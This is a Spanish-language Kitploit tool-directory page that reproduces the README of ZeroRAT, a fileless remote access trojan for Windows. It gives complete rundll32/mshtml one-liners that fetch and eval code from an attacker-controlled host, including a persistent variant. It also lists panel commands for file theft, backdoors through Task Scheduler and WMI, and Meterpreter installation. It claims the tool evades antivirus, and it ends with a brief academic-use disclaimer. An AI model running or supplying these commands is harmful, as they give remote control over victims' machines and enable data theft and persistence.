Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ZeroRAT — ZeroRAT es un control remoto de una sola línea para Windows. | Kitploit
Herramientas/GitHubGitHub/5alt/zerorat
Escalada de PrivilegiosGeneración de PayloadsMecanismos de PersistenciaExplotaciónMovimiento LateralShellcodeExfiltración de DatosPost-ExplotaciónComando y ControlHerramienta de Acceso RemotoGeneración de Shellcode
633219hace 10 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Troyano de Acceso Remoto
GitHub5alt/zerorat

ZeroRAT

ZeroRAT es un control remoto de una sola línea para Windows.

Ver Repositorio

#ZeroRAT ##Introducción Herramienta de control remoto (RAT) para Windows. El cliente solo necesita ejecutar una única instrucción; utiliza programas nativos de Windows para ejecutarse, no escribe archivos en el disco y cuenta con características naturales de evasión de antivirus. Deja de funcionar tras reiniciar.

En el programa, "download" y "upload" se refieren a la perspectiva del cliente. Cuando el cliente descarga un archivo desde el servidor se llama "download"; cuando el cliente sube un archivo al servidor se llama "upload".

##Configuración Modifica la dirección de conexión del cliente y la contraseña de administración del panel en config.py. Recuerda comprobar que la depuración (debug) esté desactivada.

El programa depende de Flask y sqlite3; instálalos tú mismo con pip.

##Cliente Reemplaza <ip>:<port> por la dirección de conexión real.

Versión normal

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}

Versión persistente

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}

##Servidor Panel: http://<ip>:<port>/server/

Los comandos compatibles con el servidor son:

  • sessions Lista los clientes activos
  • use <id> Selecciona un cliente según su id
  • set <key> <value> Establece variables globales
  • show globals/downloads/uploads Muestra las variables globales, los archivos que el cliente puede descargar y los archivos subidos por el cliente
  • delete session Elimina el cliente actual
  • delete download/upload <id> Elimina archivos según su id
  • upfile Sube un archivo al servidor y lo añade a la lista de downloads
  • download Establece las variables download_file y download_save_path para que el cliente descargue el archivo y lo guarde en download_save_path
  • upload Establece la variable upload_file para que el cliente suba el archivo en upload_file al servidor
  • backdoor tasks <time> Deja una puerta trasera mediante el Programador de tareas de Windows; formato de hora: 00:00
  • backdoor wmi Deja una puerta trasera mediante WMI; se ejecuta una vez cada hora
  • meterpreter shellcode Instala Meterpreter mediante shellcode con InstallUtil; primero debes establecer LHOST y LPORT (solo se pueden seguir recibiendo comandos después de migrar; depende de .NET Framework 2.0)
  • meterpreter powershell Instala Meterpreter mediante PowerShell (depende de PowerShell 1.0)

Excepto los comandos indicados anteriormente, todo lo demás se ejecutará como un comando del sistema de Windows.

Consulta los detalles de los comandos en /static/js/xkcd_cli.js

##Desarrollo Comandos del panel que gestionan el cliente: /static/js/xkcd_cli.js

Comandos del panel que gestionan el servidor: /controllers/server.py

Mantenimiento del cliente: /controllers/client.py

Generación del payload del cliente: payload.py

Operaciones relacionadas con la base de datos: /models/

##Contacto http://5alt.me

md5_salt [AT] qq.com

##Referencias https://gist.github.com/subTee/f1603fa5c15d5f8825c0

http://drops.wooyun.org/tips/11764

http://drops.wooyun.org/tips/8290

http://drops.wooyun.org/tips/12354

https://github.com/chromakode/xkcdfools

http://www.kammerl.de/ascii/AsciiSignature.php

https://github.com/AlessandroZ/LaZagne

##Descargo de responsabilidad Al usar esta herramienta, cumple con las leyes locales. Solo debe utilizarse con fines de prueba académica; está estrictamente prohibido controlar ilegalmente equipos ajenos. Si se causan daños, el autor no se hace responsable.

##License GPLV3

##TODO

  • Mejorar los comandos
  • Cifrar el tráfico de comunicaciones
Descargar herramienta